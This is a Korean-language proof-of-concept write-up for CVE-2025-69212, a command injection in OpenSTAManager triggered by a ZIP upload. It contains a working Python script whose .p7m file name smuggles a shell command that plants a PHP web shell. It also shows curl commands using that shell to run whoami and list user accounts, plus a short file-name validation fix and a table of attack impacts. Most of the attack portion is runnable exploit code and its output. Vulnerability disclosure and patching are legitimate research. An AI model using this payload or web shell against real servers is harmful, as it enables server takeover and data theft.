
P7M 파일 처리와 관련된 CVE-2025-69212의 개념 증명(PoC)
| Data | Detail |
|---|---|
| CVE ID | CVE-2025-69212 |
| Vuln Score | 치명적 (9.4) |
| CWE | 78: Improper Neutralization of Special Elements used in an OS Command |
| Affected Versions | OpenSTAManager <= 2.9.8 |
| Attack vector | 악성 파일 이름이 포함된 .p7m 파일이 담긴 ZIP 파일 업로드 |
| Auth | 필요 |
| Impact | 서버에서 임의 시스템 명령 실행 |
import zipfile
import time
print("Creating zip file...")
time.sleep(1)
cmd = "cd files && echo '<?php system($_GET[\"c\"]); ?>' > SHELL.php"
malicious_file = f'invoice.p7m";{cmd};echo ".p7m'
with zipfile.ZipFile('exploit.zip', 'w') as zf:
zf.writestr(malicious_file, b"")
lolw0@sys:~/OpenSTA-Exploit$ python3 exploit.py
Creating zip file...
lolw0@sys:~/OpenSTA-Exploit$ ls
-rw-rw-r 2 lolw0 lolw0 281 Aug 10 22:36 exploit.zip
명령 실행 후 XML 파싱 실패
HTTP/1.1 500 Internal Server Error
"error":{
"type":"Exception",
"message":"Start tag expected, '<' not found\n",
"code":0,
"file":"\/var\/www\/html\/openstamanager\/src\/Util\/XML.php",
"line":51}
lolw0@sys:~/OpenSTA-Exploit$ curl "http://localhost:8080/files/SHELL.php?c=whoami"
www-data
lolw0@sys:~/OpenSTA-Exploit$ curl -s --get \ --data-urlencode 'c=getent passwd | grep -E "/home|/bin/bash|/bin/sh"' \
'http://localhost:8080/files/SHELL.php'
root:x:0:0:root:/root:/bin/bash
xxxx:x:1001:1001:,,,:/home/xxxx:/usr/sbin/nologin
yyyy:x:1002:1002:,,,:/home/yyyy:/usr/sbin/nologin
zzzz:x:1003:1003:,,,:/home/zzzz:/usr/sbin/nologin
**간단한 수정 방법은 처리 전에 파일 이름을 검증하는 것입니다 (영숫자, 점, 대시, 밑줄만 허용하여 잘못된 파일 이름은 건너뜁니다)
foreach ($files_xml as $xml) {
if (!preg_match('/^[a-zA-Z0-9._-]+$/', $xml)) {
continue;
}
if (string_ends_with($xml, '.p7m')) {
$file = XML::decodeP7M($directory.'/'.$xml);
}
}
(또는 그냥 업데이트하면 됩니다 lol)
| Attack | Detail |
|---|
| 원격 코드 실행 | 명령 실행을 통한 서버 전체 장악 |
| 데이터 유출 | 모든 애플리케이션 데이터 및 데이터베이스 접근 |
| 권한 상승 | 웹 서버가 상승된 권한으로 실행 중이거나 취약한 경우 잠재적 권한 상승 가능 |
| 지속성 유지 | 백도어 설치 및 지속적인 접근 유지 |
| 수평적 이동 | 네트워크 내 다른 시스템/사용자로 이동 |